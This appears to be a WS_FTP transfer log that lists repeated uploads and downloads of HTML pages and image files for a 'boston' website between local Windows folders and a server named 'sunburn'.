10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
